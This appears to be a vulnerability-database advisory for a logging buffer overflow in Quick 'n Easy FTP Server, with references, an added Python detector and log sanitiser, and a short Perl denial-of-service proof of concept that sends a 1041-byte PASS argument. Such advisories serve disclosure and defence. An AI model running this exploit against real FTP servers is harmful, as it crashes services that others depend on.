Pablo Software Solutions Quick 'n Easy FTP Server Logging Buffer Overflow Vulnerability

Vulnerability ID: 1108268    Vulnerability type: Buffer overflow
Published: 2004-10-24    Updated: 2006-04-27
CVE: CVE-2006-2027    CNNVD ID: CNNVD-200604-467
Platform: Windows    CVSS score: 6.5
|Source
https://www.exploit-db.com/exploits/593
https://cxsecurity.com/issue/WLB-2006040109
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200604-467
|Details
Pablo Software Solutions Quick 'n Easy FTP Server Professional and Lite, probably version 3.0, contain a buffer overflow in the logging feature's handling of Unicode characters. This allows remote authenticated users to execute arbitrary code by sending a command with a long argument; the overflow is triggered when the administrator selects the "Log" option in the FTP server's main window. Note: according to the original researcher, the vendor disputes this issue.
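Defensive handling of the command lines this advisory describes, as an added example (not the advisory's, the PoC author's or the vendor's code): it flags FTP control-channel lines whose argument is oversized or non-ASCII, and shows a bounded, escaped log rendering that keeps a long Unicode argument from ever reaching a log viewer. The 512-byte threshold, the 64-character log limit and the sample lines are constructed assumptions.

```python
import re

# Constructed threshold for this example: the PoC on this page sends 1041 bytes,
# and no legitimate FTP argument to this server needs anywhere near that.
MAX_ARG_BYTES = 512
CMD_RE = re.compile(rb"^([A-Za-z]{3,4})(?: (.*))?$", re.DOTALL)


def parse_command(raw: bytes):
    """Split one control-channel line into (verb, argument bytes)."""
    line = raw.rstrip(b"\r\n")
    m = CMD_RE.match(line)
    if not m:
        return None, line
    return m.group(1).upper().decode("ascii"), m.group(2) or b""


def inspect_line(raw: bytes) -> list:
    """Return the reasons a line matches the overflow pattern, or [] if clean."""
    cmd, arg = parse_command(raw)
    reasons = []
    if cmd is None:
        reasons.append("unparseable")
    if len(arg) > MAX_ARG_BYTES:
        reasons.append("oversized-argument")
    if any(b > 0x7F for b in arg):
        reasons.append("non-ascii-argument")
    return reasons


def safe_log_entry(raw: bytes, limit: int = 64) -> str:
    """Render a command for the log file: PASS is redacted, every byte outside
    printable ASCII is escaped, and the argument is cut at `limit` characters,
    so a viewer that mishandles long Unicode input never receives such data."""
    cmd, arg = parse_command(raw)
    if cmd == "PASS":
        return "PASS <redacted>"
    shown = "".join(chr(b) if 0x20 <= b < 0x7F else f"\\x{b:02x}" for b in arg)
    if len(shown) > limit:
        shown = shown[:limit] + f"...[{len(arg)} bytes total]"
    return f"{cmd or '?'} {shown}".rstrip()


# Constructed sample control-channel lines, including the PoC's 1041-byte PASS.
SAMPLE_LINES = [
    b"USER anonymous\r\n",
    b"PASS " + b"A" * 1041 + b"\r\n",
    b"CWD " + "\u00e9".encode("utf-8") * 200 + b"\r\n",
    b"CWD /pub\r\n",
    b"QUIT\r\n",
]

if __name__ == "__main__":
    for line in SAMPLE_LINES:
        print(inspect_line(line), safe_log_entry(line))
```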
|Exploit
#!/usr/local/bin/perl -w

###########################################################
###########################################################
##   Quick 'n EasY VER 2.4 Ftp Server remote D.o.S
##         Discovered,exploited by KaGra
##	Tested on WinXP SP1 English version
## sENDING a big buffer in PASS,at least 1041 bytes
## will crash the server,as long as the logfile on server
## is viewed or just at the time it will be viewed.This
## sploit works also for almost ALL commands (like APPE
## ,CWD etc),but as u understand,for them U should have at
## least a guest account.For this sploit,no account needed.
## PS:Many thankz to muts for the shellcode at Ability Server APPE sploit...
############################################################
############################################################


use Net::FTP;


$hostname = 'localhost'; 		#Remote Host to D.o.S!
$username = 'anonymous'; 		#AnythinG HeRe!

print "\n[*]BuiLDinG BuFfer...\n";

$password = 'A' x 1041;                 #OverFlow BuffEr!
print "[*]ConnectinG To TarGet...\n";

$ftp = Net::FTP->new($hostname);        # Connecting...
print "[*]SenDing DeViL...\n\n";

$ftp->login($username, $password);      # Send EviL BuffeR...

$ftp->quit;
print "SerVer Has Been Dosed,will be Down if  LogFile is or will be viewed!\n";


# milw0rm.com [2004-10-24]
|References

Source: BUGTRAQ
Name: 20060424 Quick 'n Easy FTP Server pro/lite Logging unicode stack overflow
Link: http://www.securityfocus.com/archive/1/archive/1/431920/100/0/threaded
Source: BID
Name: 17681
Link: http://www.securityfocus.com/bid/17681
Source: OSVDB
Name: 25235
Link: http://www.osvdb.org/25235
Source: SREASON
Name: 788
Link: http://securityreason.com/securityalert/788